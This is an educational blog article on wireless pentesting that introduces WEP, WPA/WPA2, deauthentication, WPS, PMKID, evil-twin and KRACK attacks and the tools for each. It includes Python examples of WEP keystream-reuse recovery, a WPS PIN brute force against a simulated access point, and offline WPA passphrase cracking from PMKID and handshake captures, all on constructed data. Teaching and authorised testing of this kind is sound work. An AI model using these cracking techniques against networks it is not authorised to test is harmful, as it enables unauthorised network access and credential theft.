In the previous article of this series, “Wireless Pentesting Part 2 – Building a WiFi Hacking Rig”, we discussed building a WiFi hacking rig. We covered the hardware, operating systems, and software requirements for setting up your own wireless pentesting rig. In this third part of the series, we are going to introduce common wireless attacks and the tools used to perform them, which will prepare you for the fourth and final part of the series, where we will take a look at how to conduct a wireless pentest.
Addendum: Pivoting to Parrot
Before we get into wireless attacks, I wanted to provide an update and share some lessons learned from a wireless pentest I conducted at work recently. I hadn’t done much with wireless pentesting tools since the latest version of Kali Linux was released, and I found that some of the wireless tools, and the dependencies of some tools, were not installing correctly. Part of the issue is the move away from the deprecated Python 2.7: some tools have not yet been updated to Python 3.x. My newest Alfa USB WiFi adapter, the AWUS036ACH, was not working on the latest version of Kali Linux even with driver updates.
One solution would have been to use an older version of Kali Linux, but I decided to try Parrot Security, the security-focused edition of the Parrot OS Linux distribution. I was pleasantly surprised: most of the latest wireless pentesting tools were installed and ran properly, including hcxtools and hcxdumptool, which Wifite and some other tools require. Hcxdumptool captures PMKIDs and EAPOL handshakes, and hcxtools converts those captures into a format Hashcat can crack. While setting up my wireless pentesting rig, I also discovered that the SANS Institute uses Panda USB WiFi adapters in its Wireless Pentest course; most adapters other than Alfa don’t require any special setup. Because my Alfa AWUS036ACH was not working on Kali or Parrot OS, I went with an older Alfa and a Ubiquiti SR71 adapter from my consulting days. I had to use both to cover the 2.4 GHz and 5 GHz WiFi bands.
I also wanted to mention some tools that I did not previously list in this article series. During my pentest and wireless rig setup I found I needed Reaver and hcxdumptool for some non-automated attacks. Airgeddon, an automated tool very similar to Wifite, and Bettercap, used for MiTM attacks and wireless pentesting (and for Bluetooth pentesting as well), are also good tools to have. While I still like Kali Linux, Parrot OS will be my go-to OS for wireless pentesting.
Wireless Attack Surfaces
The two attack surfaces used to exploit wireless networks are clients and hotspots. The professional term for a hotspot is Access Point, or AP for short. This is the proper term, and it is important to use the right terminology to convey professionalism.
Clients on wireless networks can be computers, servers, mobile devices, and IoT (Internet of Things) devices. Mobile and IoT devices have become more common and are attractive targets for exploitation. Their traffic can be intercepted using Man-in-the-Middle (MiTM) techniques, allowing the attacker, or in our case the pentester, to capture wireless communications and collect passwords and other sensitive information from them.
Wireless APs are most commonly attacked over the air, but if an AP is physically accessible an attacker could plug into it with an Ethernet cable, which may bypass the wireless authentication entirely. Commercial wireless networks typically use lightweight APs connected to a wireless controller, which centralizes the management of many APs; these lightweight APs do not have all the functionality of a home or SOHO (Small Office Home Office) wireless router. Wireless controllers can also be physically exploited if they are not kept in a secure location. Physical attacks are easy if you have access to the wireless infrastructure and APs, but they are simple to figure out and beyond the scope of this series.
WEP Encryption Attacks exploit the Wired Equivalent Privacy (WEP) protocol. WEP encrypts each frame with RC4 keyed by a 24-bit initialization vector (IV), sent in the clear, concatenated with the shared key. The attacker captures a large number of IVs (Aireplay-ng can speed this up by replaying captured ARP requests so the AP generates fresh frames) and uses a statistical attack such as PTW to recover the WEP key itself, usually within minutes.
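The reason those captured IVs are so valuable comes down to keystream reuse. The following is an added example, not code from the article: it implements RC4 and the WEP framing in plain Python and shows that two frames encrypted under the same IV leak the XOR of their plaintexts, so one guessable frame (an ARP request, say) reveals the other with no key at all. The key, IV, and frame contents are constructed for illustration; the PTW key-recovery attack that Aircrack-ng performs on top of this is not implemented here.

```python
"""WEP keystream reuse, an added example (not code from the article).

WEP encrypts every frame with RC4 keyed as IV || shared key, where the
24-bit IV is sent in the clear.  With only 2^24 IVs, repeats come quickly,
and two frames under the same IV share a keystream: C1 XOR C2 == P1 XOR P2,
so one known (or guessable, e.g. ARP) plaintext reveals the other with no
key at all.  The key, IV and frame contents below are constructed.
Aircrack-ng's PTW attack goes further and recovers the key itself from
the captured IVs; that statistical attack is not implemented here.
"""
import math


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA); WEP uses it with a 40- or 104-bit key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(iv: bytes, wep_key: bytes, plaintext: bytes) -> bytes:
    """Return IV || RC4(IV || key, plaintext).  Real WEP also appends a
    CRC-32 ICV to the plaintext first; it is omitted as irrelevant here."""
    if len(iv) != 3:
        raise ValueError("WEP IVs are 24 bits")
    return iv + rc4(iv + wep_key, plaintext)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def leak_from_iv_reuse(frame1: bytes, frame2: bytes) -> bytes:
    """Given two captured frames that carry the same IV, return P1 XOR P2.
    No key is involved: the identical keystreams cancel."""
    if frame1[:3] != frame2[:3]:
        raise ValueError("different IVs: no keystream reuse to exploit")
    return xor_bytes(frame1[3:], frame2[3:])


def recover_plaintext(frame1: bytes, frame2: bytes, known_p1: bytes) -> bytes:
    """If frame1's plaintext is known, frame2's plaintext falls out of the XOR
    (for as many bytes as the known plaintext covers)."""
    return xor_bytes(leak_from_iv_reuse(frame1, frame2), known_p1)


def iv_collision_probability(frames: int, iv_bits: int = 24) -> float:
    """Birthday bound: chance that at least one IV repeats among `frames`
    frames whose IVs are drawn at random (many cards simply count up, which
    repeats deterministically after 2^24 frames)."""
    space = 2 ** iv_bits
    return 1.0 - math.exp(-frames * (frames - 1) / (2.0 * space))


if __name__ == "__main__":
    key = bytes.fromhex("0102030405")      # constructed 40-bit WEP key
    iv = bytes.fromhex("a1b2c3")           # constructed IV, reused below
    p1 = b"known-plaintext-frame"         # e.g. a predictable ARP request
    p2 = b"secret-password-leak!"         # the frame we actually want to read
    f1, f2 = wep_encrypt(iv, key, p1), wep_encrypt(iv, key, p2)
    print(recover_plaintext(f1, f2, p1))
    print(f"P(IV repeat) after 5000 frames: {iv_collision_probability(5000):.2f}")
```

Run it and the second frame's plaintext comes back from nothing but the two ciphertexts and the first frame's content. The collision probability function makes the "capture lots of IVs" advice concrete: with randomly chosen IVs a repeat is more likely than not after about 5,000 frames, and a busy network produces that in seconds, which is why ARP replay is used to force traffic on a quiet one.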
WPA/WPA2 Encryption Attacks capture the 4-way handshake between a client and the AP (the pre-shared key itself never crosses the air) and then crack the PSK offline against a wordlist. Tools used in attacking WPA/WPA2 include the Aircrack-ng suite (Airodump-ng to capture, Aireplay-ng to force a client to reconnect, and Aircrack-ng or Hashcat to crack), Wifite, and Airgeddon.
Deauthentication Attacks, or Deauth Attacks as they are most commonly called, force wireless clients off a network by sending spoofed 802.11 deauthentication frames; these management frames are not authenticated unless the network uses Protected Management Frames (802.11w). This is used to push clients onto a fake AP during an evil twin attack, or to make them reconnect so that the handshake can be captured and the AP’s key cracked.
Wireless Sniffing and Eavesdropping is performed with a network sniffer such as Wireshark, TShark, or tcpdump, using an adapter in monitor mode, as well as with man-in-the-middle (MiTM) tools like Ettercap or Bettercap.
WPS Attacks exploit Wi-Fi Protected Setup (WPS), which uses an 8-digit PIN as a shared secret to authenticate a client to an access point and hand it the network credentials (the WPA/WPA2 passphrase, or a WEP key). In the external registrar exchange, the client must present the correct PIN to the access point, and an attacking client can simply guess. A design flaw reduces the effective PIN space enough for a practical brute force: the last digit is a checksum of the other seven, and the AP confirms the two halves of the PIN separately, so at most about 11,000 guesses are needed rather than 100 million. Freely available tools such as Reaver can recover a WPS PIN this way in 4-10 hours. The WPS Pixie Dust attack goes further: against APs with weak random number generation it recovers the PIN offline from a single exchange, and it is available through Reaver (with pixiewps) or Wifite.
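To make the "11,000 guesses" figure tangible, here is an added example, not the article's code and not Reaver's, that implements the WPS PIN checksum and the half-by-half search against a simulated access point. The registrar class is an assumption that models the protocol's oracle behaviour (a NACK after M4 for a wrong first half, after M6 for a wrong second half) in memory; the real attack sends the same guesses over the air, one EAP exchange at a time, which is where the hours go.

```python
"""WPS PIN brute force against a simulated AP, an added example (not the
article's code and not Reaver's).

An 8-digit PIN looks like 10^8 possibilities, but the WSC design cuts this
down: the 8th digit is a checksum of the first 7, and the registrar
exchange verifies the PIN in two halves.  A wrong first half is rejected
after message M4, a wrong second half only after M6, so the attacker learns
which half was wrong and needs at most 10^4 + 10^3 = 11,000 attempts.
The registrar below is a simulated AP with a hard-coded PIN.
"""
from typing import Optional


def wps_checksum(first7: int) -> int:
    """Checksum digit for the first 7 digits of a WPS PIN (WSC spec)."""
    accum = 0
    pin = first7
    while pin:
        accum += 3 * (pin % 10)
        pin //= 10
        accum += pin % 10
        pin //= 10
    return (10 - accum % 10) % 10


def is_valid_pin(pin: str) -> bool:
    """True if the 8-digit PIN carries a correct checksum digit."""
    return (len(pin) == 8 and pin.isdigit()
            and wps_checksum(int(pin[:7])) == int(pin[7]))


class SimulatedRegistrar:
    """Assumed model of the oracle a WPS-enabled AP exposes to an external
    registrar.  NACK after M4 means the first half of the PIN (PSK1) was
    wrong, NACK after M6 means the second half (PSK2) was wrong, and M7
    carries the network credentials on success.
    """

    def __init__(self, pin: str):
        if not is_valid_pin(pin):
            raise ValueError("AP PIN must be a checksummed 8-digit PIN")
        self._pin = pin
        self.attempts = 0

    def try_pin(self, pin: str) -> str:
        self.attempts += 1
        if pin[:4] != self._pin[:4]:
            return "NACK_M4"
        if pin[4:] != self._pin[4:]:
            return "NACK_M6"
        return "M7"


def brute_force_pin(registrar: SimulatedRegistrar) -> Optional[str]:
    """Recover the PIN using the half-by-half oracle.

    Phase 1 fixes an arbitrary second half and searches the 10,000 first
    halves; phase 2 searches the 1,000 possible 3-digit second halves with
    the checksum digit computed rather than guessed.
    """
    first_half = None
    for i in range(10_000):
        if registrar.try_pin(f"{i:04d}0000") != "NACK_M4":
            first_half = f"{i:04d}"
            break
    if first_half is None:
        return None
    for j in range(1_000):
        digits7 = first_half + f"{j:03d}"
        candidate = digits7 + str(wps_checksum(int(digits7)))
        if registrar.try_pin(candidate) == "M7":
            return candidate
    return None


if __name__ == "__main__":
    ap = SimulatedRegistrar("12345670")   # a well-known default PIN
    print(brute_force_pin(ap), "after", ap.attempts, "attempts (max 11,000)")
```

The worst case is exactly 11,000 attempts (PIN 99999995); on average the search finishes in about half that, and an AP that locks WPS after a few failures (the usual mitigation) breaks the attack by rate limiting rather than by adding entropy.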
An Evil Twin is a fraudulent Wi-Fi access point that appears legitimate (same SSID, often a stronger signal) but is set up to eavesdrop on wireless communications; it is the wireless LAN equivalent of a phishing attack. It may be used to steal the passwords of unsuspecting users, either by monitoring their connections or by presenting a fake captive portal or login page and luring them to it. WiFi-Pumpkin, or hostapd together with a DHCP server and a captive portal, can be used to perform Evil Twin attacks.
PMKID (Pairwise Master Key Identifier) Attacks are performed against WPA/WPA2-PSK networks whose APs include a PMKID in the first message of the 4-way handshake. The PMKID is an HMAC over the Pairwise Master Key and the AP and client MAC addresses, so an attacker can request it directly from the AP, with no client present and no deauthentication, and then crack the pre-shared key offline. Once the PSK is recovered the attacker can join the Wi-Fi network and eavesdrop on its traffic. The PMKID can be captured with hcxdumptool (or recent versions of Airodump-ng) and cracked with Hashcat.
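The WPA/WPA2 handshake attack above and the PMKID attack both end in the same offline computation, so one added example covers both. This is not the article's code and not hashcat's or hcxdumptool's: it derives the PMK with PBKDF2 exactly as the standard does, computes a PMKID and a message-2 MIC from a constructed network (the SSID, MAC addresses, nonces, passphrase and wordlist are all made up), and then "cracks" both artifacts by trying wordlist candidates. The EAPOL frame builder reproduces the standard field layout so the MIC offset matches what a real capture would give you.

```python
"""Offline WPA/WPA2-PSK cracking from a PMKID or a captured 4-way handshake.

Added example, not the article's code and not hashcat's or hcxdumptool's.
Both attacks end in the same computation: for each wordlist candidate derive
PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32 bytes) and compare it
against something taken from the air.  The PMKID only needs the AP's first
EAPOL message (no client, no deauth); the handshake attack needs message 2
from a client (its SNonce and MIC).  The SSID, MAC addresses, nonces,
passphrase and wordlist below are constructed.
"""
import hashlib
import hmac
from typing import Iterable, Optional, Tuple

MIC_OFFSET = 81  # byte offset of the MIC field inside an EAPOL-Key frame


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """IEEE 802.11 PSK derivation; the 4096 PBKDF2 rounds are why cracking is slow.
    Test vector from the standard: ("password", "IEEE") -> f42c6fc5...a12e."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA).  No nonces are
    involved, which is what makes the client-less offline attack possible."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def prf_sha1(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """The 802.11 PRF-n used for pairwise key expansion."""
    out = b""
    counter = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:nbytes]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes,
               anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-384(PMK, "Pairwise key expansion", min/max MACs and nonces).
    The first 16 bytes are the KCK, the key that authenticates the handshake."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_sha1(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck: bytes, eapol_frame: bytes, key_descriptor_version: int = 2) -> bytes:
    """MIC over the EAPOL-Key frame with its MIC field zeroed.
    Version 1 (WPA/TKIP) uses HMAC-MD5, version 2 (WPA2/CCMP) HMAC-SHA1-128."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    if key_descriptor_version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """Minimal EAPOL-Key message 2 (client -> AP) with the standard field layout."""
    body = (b"\x02"                                   # descriptor type: RSN
            + (0x010A).to_bytes(2, "big")             # key info: version 2, pairwise, MIC
            + (16).to_bytes(2, "big")                 # key length
            + (1).to_bytes(8, "big")                  # replay counter
            + snonce                                  # 32-byte SNonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8    # key IV, RSC, reserved
            + mic
            + (0).to_bytes(2, "big"))                 # key data length (RSN IE omitted)
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body   # EAPOL v1, type Key


def crack_pmkid(captured: bytes, ssid: str, ap_mac: bytes, sta_mac: bytes,
                wordlist: Iterable[str]) -> Optional[str]:
    for candidate in wordlist:
        if hmac.compare_digest(pmkid(pmk_from_passphrase(candidate, ssid), ap_mac, sta_mac), captured):
            return candidate
    return None


def crack_handshake(ssid: str, ap_mac: bytes, sta_mac: bytes, anonce: bytes,
                    msg2: bytes, wordlist: Iterable[str]) -> Optional[str]:
    snonce = msg2[17:49]                                    # 4-byte header + 13
    captured_mic = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        ptk = derive_ptk(pmk_from_passphrase(candidate, ssid), ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(ptk[:16], msg2), captured_mic):
            return candidate
    return None


def demo() -> Tuple[Optional[str], Optional[str]]:
    """Build a 'capture' from a constructed network, then crack it both ways."""
    ssid, real_psk = "CorpGuest", "winter2020"
    ap_mac, sta_mac = bytes.fromhex("0011223344ff"), bytes.fromhex("66778899aabb")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    pmk = pmk_from_passphrase(real_psk, ssid)
    captured_pmkid = pmkid(pmk, ap_mac, sta_mac)             # what hcxdumptool pulls from M1
    kck = derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
    msg2 = build_eapol_msg2(snonce)
    msg2 = build_eapol_msg2(snonce, eapol_mic(kck, msg2))   # what airodump-ng captures as M2
    wordlist = ["password", "letmein", "winter2020", "Summer2019!"]
    return (crack_pmkid(captured_pmkid, ssid, ap_mac, sta_mac, wordlist),
            crack_handshake(ssid, ap_mac, sta_mac, anonce, msg2, wordlist))


if __name__ == "__main__":
    print(demo())
```

Two things worth noticing in the code: the PMKID depends only on the PMK and the two MAC addresses, which is why no nonces and therefore no client are needed, while the handshake MIC additionally needs ANonce and SNonce, which is why message 2 (and a client) must be captured. In both cases the cost is dominated by the 4096-round PBKDF2 per candidate, so the defence is the same: a passphrase that is not in any wordlist, or moving to WPA3-SAE, which removes the offline dictionary attack altogether.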
Key Reinstallation Attacks (KRACK) are a form of replay attack on the Wi-Fi Protected Access protocol that secures Wi-Fi connections. By replaying message 3 of the WPA2 4-way handshake, an attacker forces the client to reinstall the same session key and reset its packet nonce, so the same keystream is reused across packets; by matching packets encrypted under a reused nonce the attacker can decrypt traffic, and against some implementations (wpa_supplicant 2.4 and 2.5, as used on Android and Linux, which reinstalled an all-zero key) recover the key entirely. The weakness is in the Wi-Fi standard itself, not in errors made by individual products implementing a sound standard, so any correct implementation of WPA2 was vulnerable until patched. The vulnerability affects all major software platforms including Microsoft Windows, macOS, iOS, Android, Linux, OpenBSD and others. Scripts to test for this vulnerability can be found at https://www.krackattacks.com/ along with more details on the vulnerability.
So I have my WiFi hacking rig and my attack arsenal. What’s next?
We covered WiFi attacks that can be leveraged during the exploitation phase of a pentest. Most of them can be performed manually as well as with automated tools such as Wifite, Airgeddon, Reaver, or Fern WiFi Cracker. It is good to learn both the manual and the automated techniques: when an automated tool fails, knowing the manual steps underneath is what lets you see why.
To get some experience before pentesting your first WiFi network, build a lab. Acquire a used or inexpensive WiFi router, configure it for WEP, and then reconfigure it for WPA, WPA2, and WPS. Set the passwords to something easy while you get the hang of it. If you have trouble cracking the router, add its password to your wordlist so you can see what a successful crack looks like.
By the end of this four-part series, we’ll have covered everything you need to know to complete a basic wireless pentest, not just do some hacker-like things. We covered an overview of wireless pentesting in the first article and building a wireless pentesting rig in the second, and now you have been introduced to a number of different attacks. In Part 4 we will put all of the pieces together and go over the formal process of performing a wireless pentest.
Until next time keep on pwning! But please have permission.
Phillip Wylie is a Principal InfoSec Engineer on the Assessment Services Penetration Testing Team in the financial sector. Phillip is also an Adjunct Instructor at Richland College teaching Ethical Hacking and System Defense, a Bugcrowd Ambassador and the founder of The Pwn School Project. Phillip has over 21 years of experience in InfoSec and IT and has performed pentests on networks, wireless networks, and applications including thick client, web application and mobile. Phillip has a passion for sharing, mentoring and educating. This passion was his motivation to start teaching and to found The Pwn School Project, a free monthly educational meetup with a focus on hacking. Phillip holds the following certifications: CISSP, NSA-IAM, OSCP, GWAPT. Follow him @PhillipWylie